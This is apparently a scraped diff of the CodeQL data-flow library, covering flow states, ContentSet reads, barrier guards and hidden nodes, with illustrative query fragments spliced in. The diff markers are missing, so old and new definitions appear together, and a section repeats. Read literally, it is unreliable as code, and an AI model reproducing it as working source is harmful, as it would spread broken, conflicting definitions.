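// `DataFlow` module exposes `Configuration`, `FlowState`, `BarrierGuard`, and matching
// state-aware `isSource`/`isSink` overloads; `MySource`, `MySink`, `MySanitizerGuard`,
// and `myDecodeStep` are hypothetical placeholders that the query would define itself.
class Encoded extends DataFlow::FlowState {
  Encoded() { this = "Encoded" }
}

class Decoded extends DataFlow::FlowState {
  Decoded() { this = "Decoded" }
}

class MyConfig extends DataFlow::Configuration {
  MyConfig() { this = "MyConfig" }

  // Sources start out in the `Encoded` state.
  override predicate isSource(DataFlow::Node source, DataFlow::FlowState state) {
    source instanceof MySource and state instanceof Encoded
  }

  // A decoding step moves the tracked value from `Encoded` to `Decoded`.
  override predicate isAdditionalFlowStep(
    DataFlow::Node node1, DataFlow::FlowState state1, DataFlow::Node node2,
    DataFlow::FlowState state2
  ) {
    myDecodeStep(node1, node2) and state1 instanceof Encoded and state2 instanceof Decoded
  }

  // The sanitizing check is only effective once the data has been decoded.
  override predicate isBarrierGuard(DataFlow::BarrierGuard guard, DataFlow::FlowState state) {
    guard instanceof MySanitizerGuard and state instanceof Decoded
  }

  // Only decoded data is dangerous at the sink.
  override predicate isSink(DataFlow::Node sink, DataFlow::FlowState state) {
    sink instanceof MySink and state instanceof Decoded
  }
}
// ---------------------------------------------------------------------------------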
@@ -112,7 +116,7 @@ abstract class Configuration extends string {
* Holds if an arbitrary number of implicit read steps of content `c` may be
* taken at `node`.
*/
predicate allowImplicitRead(Node node, Content c) { none() }
predicate allowImplicitRead(Node node, ContentSet c) { none() }
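// Illustrative fragment (hypothetical, continuing the `MyConfig` sketch above, and
// assuming the `DataFlow` module exposes `ContentSet`): the `ContentSet` overload can
// allow implicit reads of arbitrary content at the configuration's sinks, so that
// tainted data stored inside a container still reaches a sink that receives the whole
// container. `exists(c)` suffices because `ContentSet` is a finite type.
override predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet c) {
  this.isSink(node) and exists(c)
}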
/**
* Gets the virtual dispatch branching limit when calculating field flow.
@@ -166,6 +170,14 @@ abstract class Configuration extends string {
*/
int explorationLimit() { none() }
/**
* Holds if hidden nodes should be included in the data flow graph.
*
* This feature should only be used for debugging or when the data flow graph
* is not visualized (as it is in a `path-problem` query).
*/
predicate includeHiddenNodes() { none() }
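// Illustrative fragment of a hypothetical configuration class body: opting in to hidden
// nodes, which is a debugging aid as the comment above warns, since it makes normally
// suppressed intermediate nodes visible in the computed flow paths.
override predicate includeHiddenNodes() { any() }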
/**
* Holds if there is a partial data flow path from `source` to `node`. The
* approximate distance between `node` and the closest source is `dist` and
@@ -345,9 +357,13 @@ private predicate fullBarrier(NodeEx node, Configuration config) {
pragma[nomagic]
private predicate stateBarrier(NodeEx node, FlowState state, Configuration config) {
exists(Node n |
node.asNode() = n and
exists(Node n | node.asNode() = n |
config.isBarrier(n, state)
or
exists(BarrierGuard g |
config.isBarrierGuard(g, state) and
n = g.getAGuardedNode()
)
)
}
@@ -477,8 +493,9 @@ private predicate additionalJumpStateStep(
)
}
private predicate read(NodeEx node1, Content c, NodeEx node2, Configuration config) {
read(node1.asNode(), c, node2.asNode()) and
pragma[nomagic]
private predicate readSet(NodeEx node1, ContentSet c, NodeEx node2, Configuration config) {
readSet(node1.asNode(), c, node2.asNode()) and
stepFilter(node1, node2, config)
or
exists(Node n |
@@ -488,6 +505,37 @@ private predicate read(NodeEx node1, Content c, NodeEx node2, Configuration conf
)
}
// inline to reduce fan-out via `getAReadContent`
bindingset[c]
private predicate read(NodeEx node1, Content c, NodeEx node2, Configuration config) {
exists(ContentSet cs |
readSet(node1, cs, node2, config) and
pragma[only_bind_out](c) = pragma[only_bind_into](cs).getAReadContent()
)
}
// inline to reduce fan-out via `getAReadContent`
bindingset[c]
private predicate clearsContentEx(NodeEx n, Content c) {
exists(ContentSet cs |
clearsContentCached(n.asNode(), cs) and
pragma[only_bind_out](c) = pragma[only_bind_into](cs).getAReadContent()
)
}
// inline to reduce fan-out via `getAReadContent`
bindingset[c]
private predicate expectsContentEx(NodeEx n, Content c) {
exists(ContentSet cs |
expectsContentCached(n.asNode(), cs) and
pragma[only_bind_out](c) = pragma[only_bind_into](cs).getAReadContent()
)
}
pragma[nomagic]
private predicate notExpectsContent(NodeEx n) { not expectsContentCached(n.asNode(), _) }
pragma[nomagic]
private predicate store(
NodeEx node1, TypedContent tc, NodeEx node2, DataFlowType contentType, Configuration config
) {
@@ -565,9 +613,9 @@ private module Stage1 {
)
or
// read
exists(Content c |
fwdFlowRead(c, node, cc, config) and
fwdFlowConsCand(c, config)
exists(ContentSet c |
fwdFlowReadSet(c, node, cc, config) and
fwdFlowConsCandSet(c, _, config)
)
or
// flow into a callable
@@ -591,10 +639,10 @@ private module Stage1 {
private predicate fwdFlow(NodeEx node, Configuration config) { fwdFlow(node, _, config) }
pragma[nomagic]
private predicate fwdFlowRead(Content c, NodeEx node, Cc cc, Configuration config) {
private predicate fwdFlowReadSet(ContentSet c, NodeEx node, Cc cc, Configuration config) {
exists(NodeEx mid |
fwdFlow(mid, cc, config) and
read(mid, c, node, config)
readSet(mid, c, node, config)
)
}
@@ -612,6 +660,16 @@ private module Stage1 {
)
}
/**
* Holds if `cs` may be interpreted in a read as the target of some store
* into `c`, in the flow covered by `fwdFlow`.
*/
pragma[nomagic]
private predicate fwdFlowConsCandSet(ContentSet cs, Content c, Configuration config) {
fwdFlowConsCand(c, config) and
c = cs.getAReadContent()
}
pragma[nomagic]
private predicate fwdFlowReturnPosition(ReturnPosition pos, Cc cc, Configuration config) {
exists(RetNodeEx ret |
@@ -704,9 +762,9 @@ private module Stage1 {
)
or
// read
exists(NodeEx mid, Content c |
read(node, c, mid, config) and
fwdFlowConsCand(c, pragma[only_bind_into](config)) and
exists(NodeEx mid, ContentSet c |
readSet(node, c, mid, config) and
fwdFlowConsCandSet(c, _, pragma[only_bind_into](config)) and
revFlow(mid, toReturn, pragma[only_bind_into](config))
)
or
@@ -732,10 +790,10 @@ private module Stage1 {
*/
pragma[nomagic]
private predicate revFlowConsCand(Content c, Configuration config) {
exists(NodeEx mid, NodeEx node |
exists(NodeEx mid, NodeEx node, ContentSet cs |
fwdFlow(node, pragma[only_bind_into](config)) and
read(node, c, mid, config) and
fwdFlowConsCand(c, pragma[only_bind_into](config)) and
readSet(node, cs, mid, config) and
fwdFlowConsCandSet(cs, c, pragma[only_bind_into](config)) and
revFlow(pragma[only_bind_into](mid), _, pragma[only_bind_into](config))
)
}
@@ -754,7 +812,8 @@ private module Stage1 {
* Holds if `c` is the target of both a read and a store in the flow covered
* by `revFlow`.
*/
private predicate revFlowIsReadAndStored(Content c, Configuration conf) {
pragma[nomagic]
predicate revFlowIsReadAndStored(Content c, Configuration conf) {
revFlowConsCand(c, conf) and
revFlowStore(c, _, _, conf)
}
@@ -853,8 +912,8 @@ private module Stage1 {
pragma[nomagic]
predicate readStepCand(NodeEx n1, Content c, NodeEx n2, Configuration config) {
revFlowIsReadAndStored(c, pragma[only_bind_into](config)) and
revFlow(n2, pragma[only_bind_into](config)) and
read(n1, c, n2, pragma[only_bind_into](config))
read(n1, c, n2, pragma[only_bind_into](config)) and
revFlow(n2, pragma[only_bind_into](config))
}
pragma[nomagic]
@@ -864,7 +923,10 @@ private module Stage1 {
predicate revFlow(
NodeEx node, FlowState state, boolean toReturn, ApOption returnAp, Ap ap, Configuration config
) {
revFlow(node, toReturn, config) and exists(state) and exists(returnAp) and exists(ap)
revFlow(node, toReturn, pragma[only_bind_into](config)) and
exists(state) and
exists(returnAp) and
exists(ap)
}
private predicate throughFlowNodeCand(NodeEx node, Configuration config) {
@@ -1110,8 +1172,8 @@ private module Stage2 {
if reducedViableImplInReturn(c, call) then result = TReturn(c, call) else result = ccNone()
}
bindingset[node, cc, config]
private LocalCc getLocalCc(NodeEx node, Cc cc, Configuration config) { any() }
bindingset[node, cc]
private LocalCc getLocalCc(NodeEx node, Cc cc) { any() }
bindingset[node1, state1, config]
bindingset[node2, state2, config]
@@ -1139,11 +1201,26 @@ private module Stage2 {
private predicate flowIntoCall = flowIntoCallNodeCand1/5;
pragma[nomagic]
private predicate expectsContentCand(NodeEx node, Configuration config) {
exists(Content c |
PrevStage::revFlow(node, pragma[only_bind_into](config)) and
PrevStage::revFlowIsReadAndStored(c, pragma[only_bind_into](config)) and
expectsContentEx(node, c)
)
}
bindingset[node, state, ap, config]
private predicate filter(NodeEx node, FlowState state, Ap ap, Configuration config) {
PrevStage::revFlowState(state, config) and
PrevStage::revFlowState(state, pragma[only_bind_into](config)) and
exists(ap) and
not stateBarrier(node, state, config)
not stateBarrier(node, state, config) and
(
notExpectsContent(node)
or
ap = true and
expectsContentCand(node, config)
)
}
bindingset[ap, contentType]
@@ -1198,7 +1275,7 @@ private module Stage2 {
or
exists(NodeEx mid, FlowState state0, Ap ap0, LocalCc localCc |
fwdFlow(mid, state0, cc, argAp, ap0, config) and
localCc = getLocalCc(mid, cc, config)
localCc = getLocalCc(mid, cc)
|
localStep(mid, state0, node, state, true, _, config, localCc) and
ap = ap0
@@ -1566,7 +1643,7 @@ private module Stage2 {
Configuration config
) {
exists(Ap ap2, Content c |
store(node1, tc, node2, contentType, config) and
PrevStage::storeStepCand(node1, _, tc, node2, contentType, config) and
revFlowStore(ap2, c, ap1, node1, _, tc, node2, _, _, config) and
revFlowConsCand(ap2, c, ap1, config)
)
@@ -1604,10 +1681,24 @@ private module Stage2 {
storeStepFwd(_, ap, tc, _, _, config)
}
predicate consCand(TypedContent tc, Ap ap, Configuration config) {
private predicate revConsCand(TypedContent tc, Ap ap, Configuration config) {
storeStepCand(_, ap, tc, _, _, config)
}
private predicate validAp(Ap ap, Configuration config) {
revFlow(_, _, _, _, ap, config) and ap instanceof ApNil
or
exists(TypedContent head, Ap tail |
consCand(head, tail, config) and
ap = apCons(head, tail)
)
}
predicate consCand(TypedContent tc, Ap ap, Configuration config) {
revConsCand(tc, ap, config) and
validAp(ap, config)
}
pragma[noinline]
private predicate parameterFlow(
ParamNodeEx p, Ap ap, Ap ap0, DataFlowCallable c, Configuration config
@@ -1698,7 +1789,8 @@ private module LocalFlowBigStep {
private class FlowCheckNode extends NodeEx {
FlowCheckNode() {
castNode(this.asNode()) or
clearsContentCached(this.asNode(), _)
clearsContentCached(this.asNode(), _) or
expectsContentCached(this.asNode(), _)
}
}
@@ -1706,18 +1798,31 @@ private module LocalFlowBigStep {
* Holds if `node` can be the first node in a maximal subsequence of local
* flow steps in a dataflow path.
*/
predicate localFlowEntry(NodeEx node, FlowState state, Configuration config) {
private predicate localFlowEntry(NodeEx node, FlowState state, Configuration config) {
Stage2::revFlow(node, state, config) and
(
sourceNode(node, state, config) or
jumpStep(_, node, config) or
additionalJumpStep(_, node, config) or
additionalJumpStateStep(_, _, node, state, config) or
node instanceof ParamNodeEx or
node.asNode() instanceof OutNodeExt or
store(_, _, node, _, config) or
read(_, _, node, config) or
sourceNode(node, state, config)
or
jumpStep(_, node, config)
or
additionalJumpStep(_, node, config)
or
additionalJumpStateStep(_, _, node, state, config)
or
node instanceof ParamNodeEx
or
node.asNode() instanceof OutNodeExt
or
Stage2::storeStepCand(_, _, _, node, _, config)
or
Stage2::readStepCand(_, _, node, config)
or
node instanceof FlowCheckNode
or
exists(FlowState s |
additionalLocalStateStep(_, s, node, state, config) and
s != state
)
)
}
@@ -1731,12 +1836,15 @@ private module LocalFlowBigStep {
additionalJumpStep(node, next, config) or
flowIntoCallNodeCand1(_, node, next, config) or
flowOutOfCallNodeCand1(_, node, next, config) or
store(node, _, next, _, config) or
read(node, _, next, config)
Stage2::storeStepCand(node, _, _, next, _, config) or
Stage2::readStepCand(node, _, next, config)
)
or
exists(NodeEx next, FlowState s | Stage2::revFlow(next, s, config) |
additionalJumpStateStep(node, state, next, s, config)
or
additionalLocalStateStep(node, state, next, s, config) and
s != state
)
or
Stage2::revFlow(node, state, config) and
@@ -1770,42 +1878,40 @@ private module LocalFlowBigStep {
*/
pragma[nomagic]
private predicate localFlowStepPlus(
NodeEx node1, FlowState state1, NodeEx node2, FlowState state2, boolean preservesValue,
DataFlowType t, Configuration config, LocalCallContext cc
NodeEx node1, FlowState state, NodeEx node2, boolean preservesValue, DataFlowType t,
Configuration config, LocalCallContext cc
) {
not isUnreachableInCallCached(node2.asNode(), cc.(LocalCallContextSpecificCall).getCall()) and
(
localFlowEntry(node1, pragma[only_bind_into](state1), pragma[only_bind_into](config)) and
localFlowEntry(node1, pragma[only_bind_into](state), pragma[only_bind_into](config)) and
(
localFlowStepNodeCand1(node1, node2, config) and
state1 = state2 and
preservesValue = true and
t = node1.getDataFlowType() // irrelevant dummy value
t = node1.getDataFlowType() and // irrelevant dummy value
Stage2::revFlow(node2, pragma[only_bind_into](state), pragma[only_bind_into](config))
or
additionalLocalFlowStepNodeCand2(node1, state1, node2, state2, config) and
additionalLocalFlowStepNodeCand2(node1, state, node2, state, config) and
preservesValue = false and
t = node2.getDataFlowType()
) and
node1 != node2 and
cc.relevantFor(node1.getEnclosingCallable()) and
not isUnreachableInCallCached(node1.asNode(), cc.(LocalCallContextSpecificCall).getCall()) and
Stage2::revFlow(node2, pragma[only_bind_into](state2), pragma[only_bind_into](config))
not isUnreachableInCallCached(node1.asNode(), cc.(LocalCallContextSpecificCall).getCall())
or
exists(NodeEx mid |
localFlowStepPlus(node1, state1, mid, pragma[only_bind_into](state2), preservesValue, t,
localFlowStepPlus(node1, pragma[only_bind_into](state), mid, preservesValue, t,
pragma[only_bind_into](config), cc) and
localFlowStepNodeCand1(mid, node2, config) and
not mid instanceof FlowCheckNode and
Stage2::revFlow(node2, pragma[only_bind_into](state2), pragma[only_bind_into](config))
Stage2::revFlow(node2, pragma[only_bind_into](state), pragma[only_bind_into](config))
)
or
exists(NodeEx mid, FlowState st |
localFlowStepPlus(node1, state1, mid, st, _, _, pragma[only_bind_into](config), cc) and
additionalLocalFlowStepNodeCand2(mid, st, node2, state2, config) and
exists(NodeEx mid |
localFlowStepPlus(node1, state, mid, _, _, pragma[only_bind_into](config), cc) and
additionalLocalFlowStepNodeCand2(mid, state, node2, state, config) and
not mid instanceof FlowCheckNode and
preservesValue = false and
t = node2.getDataFlowType() and
Stage2::revFlow(node2, state2, pragma[only_bind_into](config))
t = node2.getDataFlowType()
)
)
}
@@ -1819,9 +1925,19 @@ private module LocalFlowBigStep {
NodeEx node1, FlowState state1, NodeEx node2, FlowState state2, boolean preservesValue,
AccessPathFrontNil apf, Configuration config, LocalCallContext callContext
) {
localFlowStepPlus(node1, state1, node2, state2, preservesValue, apf.getType(), config,
callContext) and
localFlowExit(node2, state2, config)
localFlowStepPlus(node1, state1, node2, preservesValue, apf.getType(), config, callContext) and
localFlowExit(node2, state1, config) and
state1 = state2
or
additionalLocalFlowStepNodeCand2(node1, state1, node2, state2, config) and
state1 != state2 and
preservesValue = false and
apf = TFrontNil(node2.getDataFlowType()) and
callContext.relevantFor(node1.getEnclosingCallable()) and
not exists(DataFlowCall call | call = callContext.(LocalCallContextSpecificCall).getCall() |
isUnreachableInCallCached(node1.asNode(), call) or
isUnreachableInCallCached(node2.asNode(), call)
)
}
}
@@ -1879,8 +1995,8 @@ private module Stage3 {
bindingset[call, c, innercc]
private CcNoCall getCallContextReturn(DataFlowCallable c, DataFlowCall call, Cc innercc) { any() }
bindingset[node, cc, config]
private LocalCc getLocalCc(NodeEx node, Cc cc, Configuration config) { any() }
bindingset[node, cc]
private LocalCc getLocalCc(NodeEx node, Cc cc) { any() }
private predicate localStep(
NodeEx node1, FlowState state1, NodeEx node2, FlowState state2, boolean preservesValue,
@@ -1894,7 +2010,34 @@ private module Stage3 {
private predicate flowIntoCall = flowIntoCallNodeCand2/5;
pragma[nomagic]
private predicate clear(NodeEx node, Ap ap) { ap.isClearedAt(node.asNode()) }
private predicate clearSet(NodeEx node, ContentSet c, Configuration config) {
PrevStage::revFlow(node, config) and
clearsContentCached(node.asNode(), c)
}
pragma[nomagic]
private predicate clearContent(NodeEx node, Content c, Configuration config) {
exists(ContentSet cs |
PrevStage::readStepCand(_, pragma[only_bind_into](c), _, pragma[only_bind_into](config)) and
c = cs.getAReadContent() and
clearSet(node, cs, pragma[only_bind_into](config))
)
}
pragma[nomagic]
private predicate clear(NodeEx node, Ap ap, Configuration config) {
clearContent(node, ap.getHead().getContent(), config)
}
pragma[nomagic]
private predicate expectsContentCand(NodeEx node, Ap ap, Configuration config) {
exists(Content c |
PrevStage::revFlow(node, pragma[only_bind_into](config)) and
PrevStage::readStepCand(_, c, _, pragma[only_bind_into](config)) and
expectsContentEx(node, c) and
c = ap.getHead().getContent()
)
}
pragma[nomagic]
private predicate castingNodeEx(NodeEx node) { node.asNode() instanceof CastingNode }
@@ -1903,8 +2046,13 @@ private module Stage3 {
private predicate filter(NodeEx node, FlowState state, Ap ap, Configuration config) {
exists(state) and
exists(config) and
not clear(node, ap) and
if castingNodeEx(node) then compatibleTypes(node.getDataFlowType(), ap.getType()) else any()
not clear(node, ap, config) and
(if castingNodeEx(node) then compatibleTypes(node.getDataFlowType(), ap.getType()) else any()) and
(
notExpectsContent(node)
or
expectsContentCand(node, ap, config)
)
}
bindingset[ap, contentType]
@@ -1963,7 +2111,7 @@ private module Stage3 {
or
exists(NodeEx mid, FlowState state0, Ap ap0, LocalCc localCc |
fwdFlow(mid, state0, cc, argAp, ap0, config) and
localCc = getLocalCc(mid, cc, config)
localCc = getLocalCc(mid, cc)
|
localStep(mid, state0, node, state, true, _, config, localCc) and
ap = ap0
@@ -2331,7 +2479,7 @@ private module Stage3 {
Configuration config
) {
exists(Ap ap2, Content c |
store(node1, tc, node2, contentType, config) and
PrevStage::storeStepCand(node1, _, tc, node2, contentType, config) and
revFlowStore(ap2, c, ap1, node1, _, tc, node2, _, _, config) and
revFlowConsCand(ap2, c, ap1, config)
)
@@ -2369,10 +2517,24 @@ private module Stage3 {
storeStepFwd(_, ap, tc, _, _, config)
}
predicate consCand(TypedContent tc, Ap ap, Configuration config) {
private predicate revConsCand(TypedContent tc, Ap ap, Configuration config) {
storeStepCand(_, ap, tc, _, _, config)
}
private predicate validAp(Ap ap, Configuration config) {
revFlow(_, _, _, _, ap, config) and ap instanceof ApNil
or
exists(TypedContent head, Ap tail |
consCand(head, tail, config) and
ap = apCons(head, tail)
)
}
predicate consCand(TypedContent tc, Ap ap, Configuration config) {
revConsCand(tc, ap, config) and
validAp(ap, config)
}
pragma[noinline]
private predicate parameterFlow(
ParamNodeEx p, Ap ap, Ap ap0, DataFlowCallable c, Configuration config
@@ -2693,9 +2855,8 @@ private module Stage4 {
if reducedViableImplInReturn(c, call) then result = TReturn(c, call) else result = ccNone()
}
bindingset[node, cc, config]
private LocalCc getLocalCc(NodeEx node, Cc cc, Configuration config) {
localFlowEntry(node, _, config) and
bindingset[node, cc]
private LocalCc getLocalCc(NodeEx node, Cc cc) {
result =
getLocalCallContext(pragma[only_bind_into](pragma[only_bind_out](cc)),
node.getEnclosingCallable())
@@ -2791,7 +2952,7 @@ private module Stage4 {
or
exists(NodeEx mid, FlowState state0, Ap ap0, LocalCc localCc |
fwdFlow(mid, state0, cc, argAp, ap0, config) and
localCc = getLocalCc(mid, cc, config)
localCc = getLocalCc(mid, cc)
|
localStep(mid, state0, node, state, true, _, config, localCc) and
ap = ap0
@@ -3159,7 +3320,7 @@ private module Stage4 {
Configuration config
) {
exists(Ap ap2, Content c |
store(node1, tc, node2, contentType, config) and
PrevStage::storeStepCand(node1, _, tc, node2, contentType, config) and
revFlowStore(ap2, c, ap1, node1, _, tc, node2, _, _, config) and
revFlowConsCand(ap2, c, ap1, config)
)
@@ -3197,10 +3358,24 @@ private module Stage4 {
storeStepFwd(_, ap, tc, _, _, config)
}
predicate consCand(TypedContent tc, Ap ap, Configuration config) {
private predicate revConsCand(TypedContent tc, Ap ap, Configuration config) {
storeStepCand(_, ap, tc, _, _, config)
}
private predicate validAp(Ap ap, Configuration config) {
revFlow(_, _, _, _, ap, config) and ap instanceof ApNil
or
exists(TypedContent head, Ap tail |
consCand(head, tail, config) and
ap = apCons(head, tail)
)
}
predicate consCand(TypedContent tc, Ap ap, Configuration config) {
revConsCand(tc, ap, config) and
validAp(ap, config)
}
pragma[noinline]
private predicate parameterFlow(
ParamNodeEx p, Ap ap, Ap ap0, DataFlowCallable c, Configuration config
@@ -3269,17 +3444,28 @@ private Configuration unbindConf(Configuration conf) {
exists(Configuration c | result = pragma[only_bind_into](c) and conf = pragma[only_bind_into](c))
}
private predicate nodeMayUseSummary(
NodeEx n, FlowState state, AccessPathApprox apa, Configuration config
pragma[nomagic]
private predicate nodeMayUseSummary0(
NodeEx n, DataFlowCallable c, FlowState state, AccessPathApprox apa, Configuration config
) {
exists(DataFlowCallable c, AccessPathApprox apa0 |
Stage4::parameterMayFlowThrough(_, c, apa, _) and
exists(AccessPathApprox apa0 |
Stage4::parameterMayFlowThrough(_, c, _, _) and
Stage4::revFlow(n, state, true, _, apa0, config) and
Stage4::fwdFlow(n, state, any(CallContextCall ccc), TAccessPathApproxSome(apa), apa0, config) and
n.getEnclosingCallable() = c
)
}
pragma[nomagic]
private predicate nodeMayUseSummary(
NodeEx n, FlowState state, AccessPathApprox apa, Configuration config
) {
exists(DataFlowCallable c |
Stage4::parameterMayFlowThrough(_, c, apa, config) and
nodeMayUseSummary0(n, c, state, apa, config)
)
}
private newtype TSummaryCtx =
TSummaryCtxNone() or
TSummaryCtxSome(ParamNodeEx p, FlowState state, AccessPath ap) {
@@ -3475,7 +3661,7 @@ private newtype TPathNode =
* of dereference operations needed to get from the value in the node to the
* tracked object. The final type indicates the type of the tracked object.
*/
abstract private class AccessPath extends TAccessPath {
private class AccessPath extends TAccessPath {
/** Gets the head of this access path, if any. */
abstract TypedContent getHead();
@@ -3690,11 +3876,14 @@ abstract private class PathNodeImpl extends PathNode {
abstract NodeEx getNodeEx();
predicate isHidden() {
hiddenNode(this.getNodeEx().asNode()) and
not this.isSource() and
not this instanceof PathNodeSink
or
this.getNodeEx() instanceof TNodeImplicitRead
not this.getConfiguration().includeHiddenNodes() and
(
hiddenNode(this.getNodeEx().asNode()) and
not this.isSource() and
not this instanceof PathNodeSink
or
this.getNodeEx() instanceof TNodeImplicitRead
)
}
private string ppAp() {
@@ -4171,10 +4360,16 @@ private module Subpaths {
exists(NodeEx n1, NodeEx n2 | n1 = n.getNodeEx() and n2 = result.getNodeEx() |
localFlowBigStep(n1, _, n2, _, _, _, _, _) or
store(n1, _, n2, _, _) or
read(n1, _, n2, _)
readSet(n1, _, n2, _)
)
}
pragma[nomagic]
private predicate hasSuccessor(PathNode pred, PathNodeMid succ, NodeEx succNode) {
succ = pred.getASuccessor() and
succNode = succ.getNodeEx()
}
/**
* Holds if `(arg, par, ret, out)` forms a subpath-tuple, that is, flow through
* a subpath between `par` and `ret` with the connecting edges `arg -> par` and
@@ -4182,15 +4377,13 @@ private module Subpaths {
*/
predicate subpaths(PathNode arg, PathNodeImpl par, PathNodeImpl ret, PathNode out) {
exists(ParamNodeEx p, NodeEx o, FlowState sout, AccessPath apout, PathNodeMid out0 |
pragma[only_bind_into](arg).getASuccessor() = par and
pragma[only_bind_into](arg).getASuccessor() = out0 and
subpaths03(arg, p, localStepToHidden*(ret), o, sout, apout) and
pragma[only_bind_into](arg).getASuccessor() = pragma[only_bind_into](out0) and
subpaths03(pragma[only_bind_into](arg), p, localStepToHidden*(ret), o, sout, apout) and
hasSuccessor(pragma[only_bind_into](arg), par, p) and
not ret.isHidden() and
par.getNodeEx() = p and
out0.getNodeEx() = o and
out0.getState() = sout and
out0.getAp() = apout and
(out = out0 or out = out0.projectToSink())
pathNode(out0, o, sout, _, _, apout, _, _)
|
out = out0 or out = out0.projectToSink()
)
}
@@ -4526,7 +4719,11 @@ private module FlowExploration {
or
exists(PartialPathNodeRev mid |
revPartialPathStep(mid, node, state, sc1, sc2, sc3, ap, config) and
not clearsContentCached(node.asNode(), ap.getHead()) and
not clearsContentEx(node, ap.getHead()) and
(
notExpectsContent(node) or
expectsContentEx(node, ap.getHead())
) and
not fullBarrier(node, config) and
not stateBarrier(node, state, config) and
distSink(node.getEnclosingCallable(), config) <= config.explorationLimit()
@@ -4542,7 +4739,11 @@ private module FlowExploration {
partialPathStep(mid, node, state, cc, sc1, sc2, sc3, ap, config) and
not fullBarrier(node, config) and
not stateBarrier(node, state, config) and
not clearsContentCached(node.asNode(), ap.getHead().getContent()) and
not clearsContentEx(node, ap.getHead().getContent()) and
(
notExpectsContent(node) or
expectsContentEx(node, ap.getHead().getContent())
) and
if node.asNode() instanceof CastingNode
then compatibleTypes(node.getDataFlowType(), ap.getType())
else any()
@@ -4976,6 +5177,7 @@ private module FlowExploration {
)
}
pragma[nomagic]
private predicate revPartialPathStep(
PartialPathNodeRev mid, NodeEx node, FlowState state, TRevSummaryCtx1 sc1, TRevSummaryCtx2 sc2,
TRevSummaryCtx3 sc3, RevPartialAccessPath ap, Configuration config

View File

@@ -94,15 +94,19 @@ abstract class Configuration extends string {
predicate isBarrierGuard(BarrierGuard guard) { none() }
/**
* Holds if the additional flow step from `node1` to `node2` must be taken
* into account in the analysis.
* Holds if data flow through nodes guarded by `guard` is prohibited when
* the flow state is `state`.
*/
predicate isBarrierGuard(BarrierGuard guard, FlowState state) { none() }
/**
* Holds if data may flow from `node1` to `node2` in addition to the normal data-flow steps.
*/
predicate isAdditionalFlowStep(Node node1, Node node2) { none() }
/**
* Holds if the additional flow step from `node1` to `node2` must be taken
* into account in the analysis. This step is only applicable in `state1` and
* updates the flow state to `state2`.
* Holds if data may flow from `node1` to `node2` in addition to the normal data-flow steps.
* This step is only applicable in `state1` and updates the flow state to `state2`.
*/
predicate isAdditionalFlowStep(Node node1, FlowState state1, Node node2, FlowState state2) {
none()
@@ -112,7 +116,7 @@ abstract class Configuration extends string {
* Holds if an arbitrary number of implicit read steps of content `c` may be
* taken at `node`.
*/
predicate allowImplicitRead(Node node, Content c) { none() }
predicate allowImplicitRead(Node node, ContentSet c) { none() }
/**
* Gets the virtual dispatch branching limit when calculating field flow.
@@ -166,6 +170,14 @@ abstract class Configuration extends string {
*/
int explorationLimit() { none() }
/**
* Holds if hidden nodes should be included in the data flow graph.
*
* This feature should only be used for debugging or when the data flow graph
* is not visualized (as it is in a `path-problem` query).
*/
predicate includeHiddenNodes() { none() }
/**
* Holds if there is a partial data flow path from `source` to `node`. The
* approximate distance between `node` and the closest source is `dist` and
@@ -345,9 +357,13 @@ private predicate fullBarrier(NodeEx node, Configuration config) {
pragma[nomagic]
private predicate stateBarrier(NodeEx node, FlowState state, Configuration config) {
exists(Node n |
node.asNode() = n and
exists(Node n | node.asNode() = n |
config.isBarrier(n, state)
or
exists(BarrierGuard g |
config.isBarrierGuard(g, state) and
n = g.getAGuardedNode()
)
)
}
@@ -477,8 +493,9 @@ private predicate additionalJumpStateStep(
)
}
private predicate read(NodeEx node1, Content c, NodeEx node2, Configuration config) {
read(node1.asNode(), c, node2.asNode()) and
pragma[nomagic]
private predicate readSet(NodeEx node1, ContentSet c, NodeEx node2, Configuration config) {
readSet(node1.asNode(), c, node2.asNode()) and
stepFilter(node1, node2, config)
or
exists(Node n |
@@ -488,6 +505,37 @@ private predicate read(NodeEx node1, Content c, NodeEx node2, Configuration conf
)
}
// inline to reduce fan-out via `getAReadContent`
bindingset[c]
private predicate read(NodeEx node1, Content c, NodeEx node2, Configuration config) {
exists(ContentSet cs |
readSet(node1, cs, node2, config) and
pragma[only_bind_out](c) = pragma[only_bind_into](cs).getAReadContent()
)
}
// inline to reduce fan-out via `getAReadContent`
bindingset[c]
private predicate clearsContentEx(NodeEx n, Content c) {
exists(ContentSet cs |
clearsContentCached(n.asNode(), cs) and
pragma[only_bind_out](c) = pragma[only_bind_into](cs).getAReadContent()
)
}
// inline to reduce fan-out via `getAReadContent`
bindingset[c]
private predicate expectsContentEx(NodeEx n, Content c) {
exists(ContentSet cs |
expectsContentCached(n.asNode(), cs) and
pragma[only_bind_out](c) = pragma[only_bind_into](cs).getAReadContent()
)
}
pragma[nomagic]
private predicate notExpectsContent(NodeEx n) { not expectsContentCached(n.asNode(), _) }
pragma[nomagic]
private predicate store(
NodeEx node1, TypedContent tc, NodeEx node2, DataFlowType contentType, Configuration config
) {
@@ -565,9 +613,9 @@ private module Stage1 {
)
or
// read
exists(Content c |
fwdFlowRead(c, node, cc, config) and
fwdFlowConsCand(c, config)
exists(ContentSet c |
fwdFlowReadSet(c, node, cc, config) and
fwdFlowConsCandSet(c, _, config)
)
or
// flow into a callable
@@ -591,10 +639,10 @@ private module Stage1 {
private predicate fwdFlow(NodeEx node, Configuration config) { fwdFlow(node, _, config) }
pragma[nomagic]
private predicate fwdFlowRead(Content c, NodeEx node, Cc cc, Configuration config) {
private predicate fwdFlowReadSet(ContentSet c, NodeEx node, Cc cc, Configuration config) {
exists(NodeEx mid |
fwdFlow(mid, cc, config) and
read(mid, c, node, config)
readSet(mid, c, node, config)
)
}
@@ -612,6 +660,16 @@ private module Stage1 {
)
}
/**
* Holds if `cs` may be interpreted in a read as the target of some store
* into `c`, in the flow covered by `fwdFlow`.
*/
pragma[nomagic]
private predicate fwdFlowConsCandSet(ContentSet cs, Content c, Configuration config) {
fwdFlowConsCand(c, config) and
c = cs.getAReadContent()
}
pragma[nomagic]
private predicate fwdFlowReturnPosition(ReturnPosition pos, Cc cc, Configuration config) {
exists(RetNodeEx ret |
@@ -704,9 +762,9 @@ private module Stage1 {
)
or
// read
exists(NodeEx mid, Content c |
read(node, c, mid, config) and
fwdFlowConsCand(c, pragma[only_bind_into](config)) and
exists(NodeEx mid, ContentSet c |
readSet(node, c, mid, config) and
fwdFlowConsCandSet(c, _, pragma[only_bind_into](config)) and
revFlow(mid, toReturn, pragma[only_bind_into](config))
